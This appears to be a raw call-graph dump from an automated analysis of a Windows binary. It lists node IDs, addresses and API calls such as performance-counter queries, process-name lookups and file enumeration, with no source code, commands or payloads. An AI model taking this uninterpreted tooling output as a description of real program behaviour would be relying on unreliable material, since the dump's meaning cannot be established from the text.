18490 192913e81c0 18491 192913e81c9 __scrt_acquire_startup_lock 18490->18491 18493 192913e81cd 18491->18493 18494 192913ebbb4 18491->18494 18495 192913ebbd4 18494->18495 18522 192913ebbed 18494->18522 18496 192913ebbdc 18495->18496 18497 192913ebbf2 18495->18497 18498 192913ed1f4 __std_exception_copy 13 API calls 18496->18498 18499 192913ee864 56 API calls 18497->18499 18500 192913ebbe1 18498->18500 18501 192913ebbf7 18499->18501 18503 192913ed04c _invalid_parameter_noinfo 38 API calls 18500->18503 18523 192913edf38 GetModuleFileNameW 18501->18523 18503->18522 18507 192913ebb54 13 API calls 18508 192913ebc61 18507->18508 18509 192913ebc7a 18508->18509 18510 192913ebc69 18508->18510 18512 192913eb994 14 API calls 18509->18512 18511 192913ed1f4 __std_exception_copy 13 API calls 18510->18511 18513 192913ebc6e 18511->18513 18514 192913ebc96 18512->18514 18515 192913ed2a0 __free_lconv_num 13 API calls 18513->18515 18514->18513 18516 192913ebcdf 18514->18516 18517 192913ebcc6 18514->18517 18515->18522 18520 192913ed2a0 __free_lconv_num 13 API calls 18516->18520 18518 192913ed2a0 __free_lconv_num 13 API calls 18517->18518 18519 192913ebccf 18518->18519 18521 192913ed2a0 __free_lconv_num 13 API calls 18519->18521 18520->18513 18521->18522 18522->18493 18524 192913edf91 18523->18524 18525 192913edf7d GetLastError 18523->18525 18527 192913edd78 14 API calls 18524->18527 18526 192913ed184 13 API calls 18525->18526 18528 192913edf8a 18526->18528 18529 192913edfbf 18527->18529 18530 192913e8070 _invalid_parameter_noinfo 8 API calls 18528->18530 18531 192913ef198 9 API calls 18529->18531 18534 192913edfd0 18529->18534 18533 192913ebc0e 18530->18533 18531->18534 18535 192913eb994 18533->18535 18541 192913ede1c 18534->18541 18537 192913eb9d2 18535->18537 18539 192913eba38 18537->18539 18555 192913eec1c 18537->18555 18538 192913ebb25 18538->18507 18539->18538 18540 192913eec1c 14 API calls 18539->18540 18540->18539 18542 192913ede5b 18541->18542 18545 192913ede40 18541->18545 18543 192913eece8 WideCharToMultiByte 18542->18543 18549 192913ede60 18542->18549 18544 192913edeb7 18543->18544 18546 192913edebe GetLastError 18544->18546 18544->18549 18550 192913edee9 18544->18550 18545->18528 18548 192913ed184 13 API calls 18546->18548 18547 192913ed1f4 __std_exception_copy 13 API calls 18547->18545 18551 192913edecb 18548->18551 18549->18545 18549->18547 18552 192913eece8 WideCharToMultiByte 18550->18552 18553 192913ed1f4 __std_exception_copy 13 API calls 18551->18553 18554 192913edf10 18552->18554 18553->18545 18554->18545 18554->18546 18556 192913eeba8 18555->18556 18557 192913edd78 14 API calls 18556->18557 18558 192913eebcc 18557->18558 18558->18537 15465 192913e34b8 15466 192913e34e8 15465->15466 15467 192913e35a1 15466->15467 15468 192913e3505 PdhGetCounterInfoW 15466->15468 15468->15467 15469 192913e3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15468->15469 15470 192913e358d GetProcessHeap HeapFree 15469->15470 15471 192913e3555 StrCmpW 15469->15471 15470->15467 15471->15470 15473 192913e356a 15471->15473 15473->15470 15474 192913e3950 StrCmpNW 15473->15474 15475 192913e39f2 15474->15475 15476 192913e3982 StrStrW 15474->15476 15475->15473 15476->15475 15477 192913e399b StrToIntW 15476->15477 15477->15475 15478 192913e39c3 15477->15478 15478->15475 15484 192913e1a30 OpenProcess 15478->15484 15481 192913e3f88 StrCmpNIW 15482 192913e39e4 15481->15482 15482->15475 15490 192913e1cfc 15482->15490 15485 192913e1ab6 15484->15485 15486 192913e1a64 K32GetModuleFileNameExW 15484->15486 15485->15475 15485->15481 15487 192913e1a7e PathFindFileNameW lstrlenW 15486->15487 15488 192913e1aad CloseHandle 15486->15488 15487->15488 15489 192913e1a9c StrCpyW 15487->15489 15488->15485 15489->15488 15491 192913e1d1c 15490->15491 15492 192913e1d13 15490->15492 15491->15475 15493 192913e1530 2 API calls 15492->15493 15493->15491 17527 192913e2ab4 TlsGetValue TlsGetValue TlsGetValue 17528 192913e2b0d 17527->17528 17533 192913e2b79 17527->17533 17530 192913e2b15 17528->17530 17528->17533 17529 192913e2b74 17530->17529 17531 192913e2c32 TlsSetValue TlsSetValue TlsSetValue 17530->17531 17532 192913e3f88 StrCmpNIW 17530->17532 17531->17529 17532->17530 17533->17529 17533->17531 17534 192913e3f88 StrCmpNIW 17533->17534 17534->17533 17544 192913eaaac 17545 192913eaad9 __except_validate_context_record 17544->17545 17546 192913e9324 __CxxCallCatchBlock 9 API calls 17545->17546 17547 192913eaade 17546->17547 17548 192913eabc6 17547->17548 17550 192913eab38 17547->17550 17560 192913eab8c 17547->17560 17555 192913eabe5 17548->17555 17580 192913e99cc 17548->17580 17551 192913eabb3 17550->17551 17554 192913eab5a __GetCurrentState 17550->17554 17550->17560 17573 192913e95d0 17551->17573 17557 192913eacdd 17554->17557 17561 192913eafb8 17554->17561 17558 192913eac34 17555->17558 17555->17560 17583 192913e99e0 17555->17583 17558->17560 17586 192913ea22c 17558->17586 17562 192913e99cc Is_bad_exception_allowed 9 API calls 17561->17562 17563 192913eafe7 __GetCurrentState 17562->17563 17564 192913e9324 __CxxCallCatchBlock 9 API calls 17563->17564 17571 192913eb004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17564->17571 17565 192913eb0fb 17566 192913e9324 __CxxCallCatchBlock 9 API calls 17565->17566 17567 192913eb100 17566->17567 17568 192913e9324 __CxxCallCatchBlock 9 API calls 17567->17568 17570 192913eb10b __FrameHandler3::GetHandlerSearchState 17567->17570 17568->17570 17569 192913e99cc 9 API calls Is_bad_exception_allowed 17569->17571 17570->17560 17571->17565 17571->17569 17571->17570 17572 192913e99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17571->17572 17572->17571 17643 192913e9634 17573->17643 17575 192913e95ef __FrameHandler3::ExecutionInCatch 17647 192913e9540 17575->17647 17578 192913eafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17579 192913e9624 17578->17579 17579->17560 17581 192913e9324 __CxxCallCatchBlock 9 API calls 17580->17581 17582 192913e99d5 17581->17582 17582->17555 17584 192913e9324 __CxxCallCatchBlock 9 API calls 17583->17584 17585 192913e99e9 17584->17585 17585->17558 17651 192913eb144 17586->17651 17588 192913ea6f4 17589 192913ea645 17589->17588 17629 192913ea643 17589->17629 17704 192913ea6fc 17589->17704 17590 192913ea373 17590->17589 17635 192913ea3ab 17590->17635 17591 192913e9324 __CxxCallCatchBlock 9 API calls 17594 192913ea687 17591->17594 17594->17588 17597 192913e8070 _invalid_parameter_noinfo 8 API calls 17594->17597 17595 192913ea575 17601 192913e99cc Is_bad_exception_allowed 9 API calls 17595->17601 17602 192913ea592 17595->17602 17595->17629 17596 192913e9324 __CxxCallCatchBlock 9 API calls 17598 192913ea2da 17596->17598 17600 192913ea69a 17597->17600 17598->17594 17599 192913e9324 __CxxCallCatchBlock 9 API calls 17598->17599 17603 192913ea2ea 17599->17603 17600->17560 17601->17602 17605 192913ea5b4 17602->17605 17602->17629 17697 192913e95a4 17602->17697 17606 192913e9324 __CxxCallCatchBlock 9 API calls 17603->17606 17607 192913ea5ca 17605->17607 17608 192913ea6d7 17605->17608 17605->17629 17609 192913ea2f3 17606->17609 17610 192913ea5d5 17607->17610 17613 192913e99cc Is_bad_exception_allowed 9 API calls 17607->17613 17611 192913e9324 __CxxCallCatchBlock 9 API calls 17608->17611 17662 192913e9a0c 17609->17662 17617 192913eb1dc 9 API calls 17610->17617 17614 192913ea6dd 17611->17614 17613->17610 17616 192913e9324 __CxxCallCatchBlock 9 API calls 17614->17616 17619 192913ea6e6 17616->17619 17620 192913ea5eb 17617->17620 17618 192913e99e0 9 API calls 17618->17635 17622 192913ec2f4 14 API calls 17619->17622 17624 192913e9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17620->17624 17620->17629 17621 192913e9324 __CxxCallCatchBlock 9 API calls 17623 192913ea335 17621->17623 17622->17588 17623->17590 17626 192913e9324 __CxxCallCatchBlock 9 API calls 17623->17626 17625 192913ea605 17624->17625 17701 192913e9838 RtlUnwindEx 17625->17701 17628 192913ea341 17626->17628 17630 192913e9324 __CxxCallCatchBlock 9 API calls 17628->17630 17629->17591 17631 192913ea34a 17630->17631 17665 192913eb1dc 17631->17665 17635->17595 17635->17618 17676 192913ea96c 17635->17676 17690 192913ea158 17635->17690 17637 192913ea35e 17672 192913eb2cc 17637->17672 17639 192913ea6d1 17640 192913ec2f4 14 API calls 17639->17640 17640->17608 17641 192913ea366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 17641->17639 17716 192913e9178 17641->17716 17646 192913e9662 __FrameHandler3::ExecutionInCatch 17643->17646 17644 192913e96d4 17644->17575 17645 192913e968c RtlLookupFunctionEntry 17645->17646 17646->17644 17646->17645 17648 192913e958b 17647->17648 17650 192913e9560 17647->17650 17648->17578 17649 192913e9324 __CxxCallCatchBlock 9 API calls 17649->17650 17650->17648 17650->17649 17652 192913eb169 __FrameHandler3::ExecutionInCatch 17651->17652 17653 192913e9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17652->17653 17654 192913eb17e 17653->17654 17721 192913e9db4 17654->17721 17657 192913eb190 __FrameHandler3::GetHandlerSearchState 17724 192913e9dec 17657->17724 17658 192913eb1b3 17659 192913e9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 17658->17659 17661 192913ea28e 17659->17661 17661->17588 17661->17590 17661->17596 17663 192913e9324 __CxxCallCatchBlock 9 API calls 17662->17663 17664 192913e9a1a 17663->17664 17664->17588 17664->17621 17666 192913eb2c3 17665->17666 17671 192913eb207 17665->17671 17667 192913ea35a 17667->17590 17667->17637 17668 192913e99e0 9 API calls 17668->17671 17669 192913e99cc Is_bad_exception_allowed 9 API calls 17669->17671 17670 192913ea96c 9 API calls 17670->17671 17671->17667 17671->17668 17671->17669 17671->17670 17673 192913eb2e9 Is_bad_exception_allowed 17672->17673 17675 192913eb339 17672->17675 17674 192913e99cc 9 API calls Is_bad_exception_allowed 17673->17674 17673->17675 17674->17673 17675->17641 17677 192913ea999 17676->17677 17689 192913eaa28 17676->17689 17678 192913e99cc Is_bad_exception_allowed 9 API calls 17677->17678 17679 192913ea9a2 17678->17679 17680 192913e99cc Is_bad_exception_allowed 9 API calls 17679->17680 17681 192913ea9bb 17679->17681 17679->17689 17680->17681 17682 192913ea9e7 17681->17682 17683 192913e99cc Is_bad_exception_allowed 9 API calls 17681->17683 17681->17689 17684 192913e99e0 9 API calls 17682->17684 17683->17682 17686 192913ea9fb 17684->17686 17685 192913eaa14 17688 192913e99e0 9 API calls 17685->17688 17686->17685 17687 192913e99cc Is_bad_exception_allowed 9 API calls 17686->17687 17686->17689 17687->17685 17688->17689 17689->17635 17691 192913e9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17690->17691 17692 192913ea195 17691->17692 17693 192913e99cc Is_bad_exception_allowed 9 API calls 17692->17693 17694 192913ea1cd 17693->17694 17695 192913e9838 9 API calls 17694->17695 17696 192913ea211 17695->17696 17696->17635 17698 192913e95b8 __FrameHandler3::ExecutionInCatch 17697->17698 17699 192913e9540 __FrameHandler3::ExecutionInCatch 9 API calls 17698->17699 17700 192913e95c2 17699->17700 17700->17605 17702 192913e8070 _invalid_parameter_noinfo 8 API calls 17701->17702 17703 192913e9932 17702->17703 17703->17629 17705 192913ea735 17704->17705 17709 192913ea948 17704->17709 17706 192913e9324 __CxxCallCatchBlock 9 API calls 17705->17706 17707 192913ea73a 17706->17707 17708 192913ea759 EncodePointer 17707->17708 17715 192913ea7ac 17707->17715 17710 192913e9324 __CxxCallCatchBlock 9 API calls 17708->17710 17709->17629 17711 192913ea769 17710->17711 17711->17715 17727 192913e94ec 17711->17727 17713 192913e99cc 9 API calls Is_bad_exception_allowed 17713->17715 17714 192913ea158 19 API calls 17714->17715 17715->17709 17715->17713 17715->17714 17717 192913e9197 17716->17717 17718 192913e91c0 RtlPcToFileHeader 17717->17718 17719 192913e91e2 RaiseException 17717->17719 17720 192913e91d8 17718->17720 17719->17639 17720->17719 17722 192913e9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17721->17722 17723 192913e9dc7 17722->17723 17723->17657 17723->17658 17725 192913e9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17724->17725 17726 192913e9e06 17725->17726 17726->17661 17728 192913e9324 __CxxCallCatchBlock 9 API calls 17727->17728 17729 192913e9518 17728->17729 17729->17715 17730 1929162d658 17731 1929162d67d 17730->17731 17736 1929162d694 17730->17736 17732 1929162d1f4 __std_exception_copy 13 API calls 17731->17732 17733 1929162d682 17732->17733 17735 1929162d04c _invalid_parameter_noinfo 38 API calls 17733->17735 17734 1929162d724 17862 1929162bb54 17734->17862 17757 1929162d68d 17735->17757 17736->17734 17749 1929162d7b6 17736->17749 17750 1929162d6da 17736->17750 17763 1929162d894 17736->17763 17825 1929162da18 17736->17825 17741 1929162d784 17743 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17741->17743 17742 1929162d836 17744 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17742->17744 17747 1929162d78b 17743->17747 17748 1929162d841 17744->17748 17745 1929162d7d7 17745->17742 17760 1929162d87c 17745->17760 17868 19291630eb8 17745->17868 17746 1929162d6fd 17752 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17746->17752 17747->17746 17751 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17747->17751 17753 1929162d85a 17748->17753 17758 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17748->17758 17749->17746 17754 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17749->17754 17750->17746 17755 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17750->17755 17751->17747 17752->17757 17759 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17753->17759 17754->17749 17755->17750 17758->17748 17759->17757 17761 1929162d06c _invalid_parameter_noinfo 17 API calls 17760->17761 17762 1929162d891 17761->17762 17764 1929162d8c2 17763->17764 17765 1929162d8de 17764->17765 17766 1929162d220 __std_exception_copy 13 API calls 17764->17766 17765->17736 17767 1929162d90d 17766->17767 17768 1929162d926 17767->17768 17769 19291630eb8 38 API calls 17767->17769 17770 19291630eb8 38 API calls 17768->17770 17772 1929162d9fc 17768->17772 17769->17768 17771 1929162d943 17770->17771 17771->17772 17774 1929162d97f 17771->17774 17775 1929162d962 17771->17775 17776 1929162d98d 17771->17776 17773 1929162d06c _invalid_parameter_noinfo 17 API calls 17772->17773 17785 1929162da17 17773->17785 17779 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17774->17779 17778 1929162d220 __std_exception_copy 13 API calls 17775->17778 17777 1929162d977 17776->17777 17877 1929162eee0 17776->17877 17777->17774 17782 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17777->17782 17783 1929162d96d 17778->17783 17779->17772 17781 1929162da7a 17790 1929162da8c 17781->17790 17794 1929162daa1 17781->17794 17782->17774 17786 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17783->17786 17784 1929162d9b5 17787 1929162d9ba 17784->17787 17788 1929162d9d0 17784->17788 17785->17781 17886 192916313d8 17785->17886 17786->17777 17791 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17787->17791 17792 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17788->17792 17793 1929162d894 52 API calls 17790->17793 17791->17777 17792->17774 17795 1929162da9c 17793->17795 17797 1929162dd78 14 API calls 17794->17797 17796 19291628070 _invalid_parameter_noinfo 8 API calls 17795->17796 17798 1929162dd64 17796->17798 17799 1929162db0b 17797->17799 17798->17736 17801 1929162db1a 17799->17801 17895 1929162f198 17799->17895 17899 1929162d30c 17801->17899 17804 1929162dba8 17805 1929162d894 52 API calls 17804->17805 17807 1929162dbb8 17805->17807 17806 1929162dd78 14 API calls 17812 1929162dbd2 17806->17812 17807->17795 17808 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17807->17808 17808->17795 17809 1929162f198 9 API calls 17809->17812 17811 1929162d894 52 API calls 17811->17812 17812->17806 17812->17809 17812->17811 17813 1929162dcc8 FindNextFileW 17812->17813 17814 1929162dd2a 17812->17814 17820 1929162d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 17812->17820 17921 1929162d4ac 17812->17921 17813->17812 17815 1929162dce0 17813->17815 17816 1929162dd38 FindClose 17814->17816 17818 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17814->17818 17817 1929162dd0c FindClose 17815->17817 17943 19291630b20 17815->17943 17816->17795 17819 1929162dd48 17816->17819 17817->17795 17822 1929162dd1c 17817->17822 17818->17816 17823 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17819->17823 17820->17812 17824 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17822->17824 17823->17795 17824->17795 17826 1929162da58 17825->17826 17827 1929162da7a 17825->17827 17826->17827 17828 192916313d8 38 API calls 17826->17828 17829 1929162da8c 17827->17829 17831 1929162daa1 17827->17831 17828->17826 17830 1929162d894 56 API calls 17829->17830 17843 1929162da9c 17830->17843 17833 1929162dd78 14 API calls 17831->17833 17832 19291628070 _invalid_parameter_noinfo 8 API calls 17834 1929162dd64 17832->17834 17835 1929162db0b 17833->17835 17834->17736 17836 1929162db1a 17835->17836 17837 1929162f198 9 API calls 17835->17837 17838 1929162d30c 16 API calls 17836->17838 17837->17836 17839 1929162db7b FindFirstFileExW 17838->17839 17840 1929162dba8 17839->17840 17849 1929162dbd2 17839->17849 17841 1929162d894 56 API calls 17840->17841 17844 1929162dbb8 17841->17844 17842 1929162dd78 14 API calls 17842->17849 17843->17832 17844->17843 17845 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17844->17845 17845->17843 17846 1929162f198 9 API calls 17846->17849 17847 1929162d4ac 16 API calls 17847->17849 17848 1929162d894 56 API calls 17848->17849 17849->17842 17849->17846 17849->17847 17849->17848 17850 1929162dcc8 FindNextFileW 17849->17850 17851 1929162dd2a 17849->17851 17857 1929162d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 17849->17857 17850->17849 17852 1929162dce0 17850->17852 17853 1929162dd38 FindClose 17851->17853 17855 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17851->17855 17854 1929162dd0c FindClose 17852->17854 17858 19291630b20 38 API calls 17852->17858 17853->17843 17856 1929162dd48 17853->17856 17854->17843 17859 1929162dd1c 17854->17859 17855->17853 17860 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17856->17860 17857->17849 17858->17854 17861 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17859->17861 17860->17843 17861->17843 17863 1929162bba4 17862->17863 17864 1929162bb6c 17862->17864 17863->17741 17863->17745 17864->17863 17865 1929162d220 __std_exception_copy 13 API calls 17864->17865 17866 1929162bb9a 17865->17866 17867 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17866->17867 17867->17863 17869 19291630ed5 17868->17869 17871 19291630eda 17869->17871 17874 19291630ef0 17869->17874 17875 19291630f24 17869->17875 17870 1929162d1f4 __std_exception_copy 13 API calls 17872 19291630ee4 17870->17872 17871->17870 17871->17874 17873 1929162d04c _invalid_parameter_noinfo 38 API calls 17872->17873 17873->17874 17874->17745 17875->17874 17876 1929162d1f4 __std_exception_copy 13 API calls 17875->17876 17876->17872 17878 1929162ef02 17877->17878 17879 1929162ef1f 17877->17879 17878->17879 17880 1929162ef10 17878->17880 17883 1929162ef29 17879->17883 17951 192916319f0 17879->17951 17881 1929162d1f4 __std_exception_copy 13 API calls 17880->17881 17885 1929162ef15 17881->17885 17958 19291631a40 17883->17958 17885->17784 17887 192916313e0 17886->17887 17888 192916313f5 17887->17888 17889 1929163140e 17887->17889 17890 1929162d1f4 __std_exception_copy 13 API calls 17888->17890 17892 1929162dd78 14 API calls 17889->17892 17894 19291631405 17889->17894 17891 192916313fa 17890->17891 17893 1929162d04c _invalid_parameter_noinfo 38 API calls 17891->17893 17892->17894 17893->17894 17894->17785 17896 1929162f1a9 17895->17896 17897 1929162f1ca 17895->17897 17896->17897 17898 1929162ef88 9 API calls 17896->17898 17897->17801 17898->17897 17900 1929162d336 17899->17900 17901 1929162d35a 17899->17901 17904 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17900->17904 17906 1929162d345 FindFirstFileExW 17900->17906 17902 1929162d3bf 17901->17902 17903 1929162d35f 17901->17903 17905 1929162ec58 MultiByteToWideChar 17902->17905 17903->17906 17908 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17903->17908 17913 1929162d374 17903->17913 17904->17906 17911 1929162d3db 17905->17911 17906->17804 17906->17812 17907 1929162d3e2 GetLastError 17970 1929162d184 17907->17970 17908->17913 17909 1929162c5d0 14 API calls 17909->17906 17911->17907 17912 1929162d420 17911->17912 17916 1929162d413 17911->17916 17919 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17911->17919 17912->17906 17914 1929162ec58 MultiByteToWideChar 17912->17914 17913->17909 17917 1929162d47a 17914->17917 17920 1929162c5d0 14 API calls 17916->17920 17917->17906 17917->17907 17918 1929162d1f4 __std_exception_copy 13 API calls 17918->17906 17919->17916 17920->17912 17922 1929162d4d6 17921->17922 17923 1929162d4fa 17921->17923 17924 1929162d4e5 17922->17924 17927 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17922->17927 17925 1929162d500 17923->17925 17926 1929162d55f 17923->17926 17924->17812 17925->17924 17930 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17925->17930 17935 1929162d515 17925->17935 17928 1929162ece8 WideCharToMultiByte 17926->17928 17927->17924 17934 1929162d583 17928->17934 17929 1929162d58a GetLastError 17932 1929162d184 13 API calls 17929->17932 17930->17935 17931 1929162c5d0 14 API calls 17931->17924 17937 1929162d597 17932->17937 17933 1929162d5c7 17933->17924 17936 1929162ece8 WideCharToMultiByte 17933->17936 17934->17929 17934->17933 17938 1929162d5bb 17934->17938 17942 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17934->17942 17935->17931 17940 1929162d629 17936->17940 17941 1929162d1f4 __std_exception_copy 13 API calls 17937->17941 17939 1929162c5d0 14 API calls 17938->17939 17939->17933 17940->17924 17940->17929 17941->17924 17942->17938 17944 19291630b52 17943->17944 17945 1929162d1f4 __std_exception_copy 13 API calls 17944->17945 17950 19291630b67 17944->17950 17946 19291630b5c 17945->17946 17947 1929162d04c _invalid_parameter_noinfo 38 API calls 17946->17947 17947->17950 17948 19291628070 _invalid_parameter_noinfo 8 API calls 17949 19291630ea8 17948->17949 17949->17817 17950->17948 17952 19291631a12 HeapSize 17951->17952 17953 192916319f9 17951->17953 17954 1929162d1f4 __std_exception_copy 13 API calls 17953->17954 17955 192916319fe 17954->17955 17956 1929162d04c _invalid_parameter_noinfo 38 API calls 17955->17956 17957 19291631a09 17956->17957 17957->17883 17959 19291631a55 17958->17959 17960 19291631a5f 17958->17960 17961 1929162c5d0 14 API calls 17959->17961 17962 19291631a64 17960->17962 17969 19291631a6b __std_exception_copy 17960->17969 17963 19291631a5d 17961->17963 17964 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17962->17964 17963->17885 17964->17963 17965 19291631a71 17967 1929162d1f4 __std_exception_copy 13 API calls 17965->17967 17966 19291631a9e HeapReAlloc 17966->17963 17966->17969 17967->17963 17968 1929162b470 __std_exception_copy 2 API calls 17968->17969 17969->17965 17969->17966 17969->17968 17975 1929162d1d0 17970->17975 17972 1929162d191 Concurrency::details::SchedulerProxy::DeleteThis 17973 1929162d1f4 __std_exception_copy 13 API calls 17972->17973 17974 1929162d1a1 17973->17974 17974->17918 17976 1929162cb10 __std_exception_copy 13 API calls 17975->17976 17977 1929162d1d9 17976->17977 17977->17972 16587 192913e33a8 16589 192913e33cf 16587->16589 16588 192913e349c 16589->16588 16590 192913e33ec PdhGetCounterInfoW 16589->16590 16590->16588 16591 192913e340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 16590->16591 16592 192913e3440 StrCmpW 16591->16592 16593 192913e3488 GetProcessHeap HeapFree 16591->16593 16592->16593 16595 192913e3455 16592->16595 16593->16588 16594 192913e3950 12 API calls 16594->16595 16595->16593 16595->16594 16596 192913f0fa8 16597 192913f0fcc 16596->16597 16598 192913e8070 _invalid_parameter_noinfo 8 API calls 16597->16598 16599 192913f100e 16598->16599 14988 192913ef6a0 14999 192913ec558 EnterCriticalSection 14988->14999 14990 192913ef6b0 14991 192913f1c5c 39 API calls 14990->14991 14992 192913ef6b9 14991->14992 14993 192913ef6c7 14992->14993 14995 192913ef498 41 API calls 14992->14995 14994 192913ec5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 14993->14994 14996 192913ef6d3 14994->14996 14997 192913ef6c2 14995->14997 14998 192913ef598 GetStdHandle GetFileType 14997->14998 14998->14993 16616 192913f479d 16619 192913eaf34 16616->16619 16620 192913eaf9b 16619->16620 16621 192913eaf4e 16619->16621 16621->16620 16622 192913e9324 __CxxCallCatchBlock 9 API calls 16621->16622 16622->16620 16623 192913f1398 16624 192913f13ae 16623->16624 16625 192913f13f5 16624->16625 16627 192913f140e 16624->16627 16626 192913ed1f4 __std_exception_copy 13 API calls 16625->16626 16628 192913f13fa 16626->16628 16630 192913edd78 14 API calls 16627->16630 16631 192913f1405 16627->16631 16629 192913ed04c _invalid_parameter_noinfo 38 API calls 16628->16629 16629->16631 16630->16631 15705 1929162bd34 15706 1929162bd4d 15705->15706 15719 1929162bd49 15705->15719 15720 1929162e864 15706->15720 15711 1929162bd6b 15746 1929162bda8 15711->15746 15712 1929162bd5f 15713 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15712->15713 15713->15719 15716 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15717 1929162bd92 15716->15717 15718 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15717->15718 15718->15719 15721 1929162e871 15720->15721 15725 1929162bd52 15720->15725 15765 1929162cacc 15721->15765 15723 1929162e8a0 15770 1929162e53c 15723->15770 15726 1929162edc8 GetEnvironmentStringsW 15725->15726 15727 1929162edf8 15726->15727 15728 1929162bd57 15726->15728 15729 1929162ece8 WideCharToMultiByte 15727->15729 15728->15711 15728->15712 15730 1929162ee49 15729->15730 15731 1929162ee53 FreeEnvironmentStringsW 15730->15731 15732 1929162c5d0 14 API calls 15730->15732 15731->15728 15733 1929162ee63 15732->15733 15734 1929162ee74 15733->15734 15735 1929162ee6b 15733->15735 15737 1929162ece8 WideCharToMultiByte 15734->15737 15736 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15735->15736 15738 1929162ee72 15736->15738 15739 1929162ee97 15737->15739 15738->15731 15740 1929162eea5 15739->15740 15741 1929162ee9b 15739->15741 15742 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15740->15742 15743 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15741->15743 15744 1929162eea3 FreeEnvironmentStringsW 15742->15744 15743->15744 15744->15728 15747 1929162bdcd 15746->15747 15748 1929162d220 __std_exception_copy 13 API calls 15747->15748 15759 1929162be03 15748->15759 15749 1929162be0b 15750 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15749->15750 15752 1929162bd73 15750->15752 15751 1929162be6d 15753 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15751->15753 15752->15716 15753->15752 15754 1929162d220 __std_exception_copy 13 API calls 15754->15759 15755 1929162be92 15970 1929162bebc 15755->15970 15759->15749 15759->15751 15759->15754 15759->15755 15760 1929162bea6 15759->15760 15763 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15759->15763 15961 1929162c328 15759->15961 15762 1929162d06c _invalid_parameter_noinfo 17 API calls 15760->15762 15761 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15761->15749 15764 1929162beb9 15762->15764 15763->15759 15766 1929162cae8 FlsGetValue 15765->15766 15768 1929162cae4 15765->15768 15766->15768 15767 1929162cafe 15767->15723 15768->15767 15769 1929162c940 __std_exception_copy 13 API calls 15768->15769 15769->15767 15793 1929162e7ac 15770->15793 15777 1929162e5a7 15778 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15777->15778 15792 1929162e58e 15778->15792 15779 1929162e5b6 15779->15779 15819 1929162e8e0 15779->15819 15782 1929162e6b2 15783 1929162d1f4 __std_exception_copy 13 API calls 15782->15783 15784 1929162e6b7 15783->15784 15786 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15784->15786 15785 1929162e70d 15791 1929162e774 15785->15791 15830 1929162e05c 15785->15830 15786->15792 15787 1929162e6cc 15787->15785 15789 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15787->15789 15788 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15788->15792 15789->15785 15791->15788 15792->15725 15794 1929162e7cf 15793->15794 15798 1929162e7d9 15794->15798 15845 1929162c558 EnterCriticalSection 15794->15845 15800 1929162e571 15798->15800 15802 1929162cacc 14 API calls 15798->15802 15805 1929162e22c 15800->15805 15803 1929162e8a0 15802->15803 15804 1929162e53c 56 API calls 15803->15804 